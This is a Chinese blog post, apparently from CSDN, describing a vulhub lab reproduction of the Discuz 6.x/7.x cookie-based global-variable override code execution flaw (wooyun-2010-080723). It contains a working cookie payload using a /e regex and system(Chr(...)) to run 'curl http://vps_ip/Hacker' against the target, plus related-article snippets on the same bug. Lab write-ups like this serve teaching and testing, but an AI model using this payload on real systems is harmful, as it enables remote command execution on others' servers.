【vulhub】Discuz-命令执行 wooyun-2010-080723

最新推荐文章于 2023-06-10 22:52:03 发布
最新推荐文章于 2023-06-10 22:52:03 发布
阅读量1.7k 收藏
点赞数
分类专栏: discuz 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42884199/article/details/121746747
版权

一、启动靶机

docker-compose build

docker-compose up -d

二、安装

URL:

http://192.168.150.146:8080/install

安装数据库。数据库服务器填写db(必须db,不然安装失败),数据库名为discuz,数据库账号密码均为root,管理员密码任意。填写联系方式页面直接点击跳过本步后跳转到首页,登录成功后进入默认板块,开启Burp抓包,然后随便点击一篇贴子
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三、构造payload

请求:

GET /viewthread.php?tid=9&extra=page%3D1 HTTP/1.1
Host: 192.168.150.146:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.150.146:8080/forumdisplay.php?fid=2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check; cZZ_visitedfid=2; cZZ_oldtopics=D6D; cZZ_fid2=1638772681; cZZ_sid=i4JJSc
Connection: close



curl http://vps_ip/Hacker

命令转换为ascill码
在这里插入图片描述

替换请求中cookie为下面cookie

Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=system(Chr(99).Chr(117).Chr(114).Chr(108).Chr(32).Chr(104).Chr(116).Chr(116).Chr(112).Chr(...).Chr(97).Chr(99).Chr(107).Chr(101).Chr(114))

四、发送payload

在这里插入图片描述

五、检验

在VPS上的apache日志有靶机的请求记录

tail -n 1 -f /var/log/apache2/access.log

在这里插入图片描述

Crazy_Yu8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Vulnhub复现漏洞 - Discuz 7.x/6.x 全局变量防御绕过导致代码执行
JiangBuLiu的博客
06-28 895
Discuz 7.x/6.x 全局变量防御绕过导致代码执行Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过...
025-PY爬虫-wooyun_public-master.zip
最新发布
07-03
py爬虫,源代码
Vulhub--wooyun-2010-080723
firecjh的博客
06-10 154
安装成功后,直接找一个已存在的帖子,向其发送数据包,并在。全局变量防御绕过导致代码执行
Discuz 7.x6.x 全局变量防御绕过导致代码执行wooyun-2010-080723
黑白的博客
12-06 530
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
vulfocus——discuz命令执行(wooyun-2010-080723
m0_62063669的博客
09-15 1329
如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。2.找到一个帖子,然后用burp suite抓包。
Vulhub靶场Discuz-命令执行(wooyun-2010-080723)漏洞复现
X_python321的博客
05-16 323
Discuz-命令执行(wooyun-2010-080723)漏洞复现
discuz wooyun-2010-080723
weixin_37639863的博客
02-17 1828
漏洞复现-Discuz-命令执行wooyun-2010-080723) - 铺哩 - 博客园0x00 实验环境 攻击机:win10 靶机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 Discuz 7.x 6.x版本 0x02 实验目的 学习discuz的部分https://www.cnblogs.com/cute-puli/p/13333991.htmlbuuctf [Discuz]wooyun-2010-080723_Fatesec的博客-CSDN博客漏洞描述由于php
buuctf [Discuz]wooyun-2010-080723
qq_1873822的博客
03-23 1541
漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 https://www.secpulse.com/archives/2338.html https://www.freebuf.com/articles/web/226207.html 漏洞复现 http://node3.buuoj.cn:28226/install/来安装di
【漏洞复现-discuz-wooyun-命令执行vulfocus/discuz-wooyun_2010_080723
10-14 1152
discuz-wooyun-命令执行】Cookie中命令执行
vulhubdiscuz
haoaaao的博客
05-02 878
0x00 wooyun-2010-080723命令执行) 1、简介 2、影响版本 Discuz 7.x 6.x版本 3、搭建 安装discuz 安装数据库。数据库服务器填写db(必须db,不然安装失败) 4、复现 在默认板块,随便点进去一个帖子,用burp抓包: 构造payload: 修改cookie内容 GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE...
vulhub漏洞复现八_discuz
weixin_44193247的博客
01-09 1335
vulhub漏洞复现练习篇
wooyun_public-master.zip
08-23
标题中的"wooyun_public-master.zip"表明这是一个与Wooyun相关的开源项目,而Wooyun,也称为“乌云”,曾是中国知名的网络安全社区。这个压缩包可能是该社区公开的一部分资源或者研究资料,以"master"命名,通常代表...
wooyun-public-master-python.rar
01-23
wooyun_public-master-python.rar Python爬虫入门需要掌握Python基础语法、网络请求和数据抓取、解析HTML和XML、处理HTTP响应、数据存储、使用代理和反爬策略、并发和多线程等技术,并遵守相关法律和道德规范。
py爬虫wooyun-public-master
04-20
py爬虫wooyun_public-master提取方式是百度网盘分享地址
wooyun_public-master-python.rar
02-03
【标题】"wooyun_public-master-python.rar" 是一个压缩包文件,主要包含与Python相关的源码和学习资源。从标题来看,我们可以推测这可能是一个关于网络安全或漏洞挖掘的项目,因为“wooyun”(乌云)曾是一个知名的...
Discuz远程代码执行(CVE-2019-13956)
qq_51459600的博客
05-04 1829
Discuz! ML远程代码执行(CVE-2019-13956) 漏洞介绍: 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。 环境搭建: 靶机:CentOS7(10.10.10.137) docker环境下载: https://codeload.github.com/rhbb/CVE-2019-13956/zip/refs/heads/master 进入目录: docker-compuse up -d docker ps -a
Discuz! 后台数据库备份功能命令执行漏洞
weixin_34402408的博客
10-11 674
简介:2018年8月27号,有安全研究人员在GitHub上公布了有关Discuz!多个版本中后台数据库备份功能存在的命令执行漏洞的细节。修复方案:目前官方对于老版本Discuz不再更新,如需要手动修复此漏洞,较可靠的做法是将Discuz升级到Discuz3.4或以上版本。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采...
7.2 discuz 拿shell_discuz 7.2代码执行漏洞利用方法两则
weixin_39612038的博客
12-22 647
使用该exp的话仅限本机测试,其他用途后果自负!第一种方法:先注册个用户然后把帖子ID,指定一个存在的帖子即可:chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'');里面有个提交地址改下,保存html打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd第二...
某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org
05-03 153
某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org 某运营商广告投放系统SQL注射漏洞 | WooYun-2012-06396 | WooYun.org 漏洞概要 关注数(13) 关注此漏洞 缺陷编...
wooyun-2010-09336
01-14
wooyun-2010-09336是2010年发生的一起网络安全漏洞事件。这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值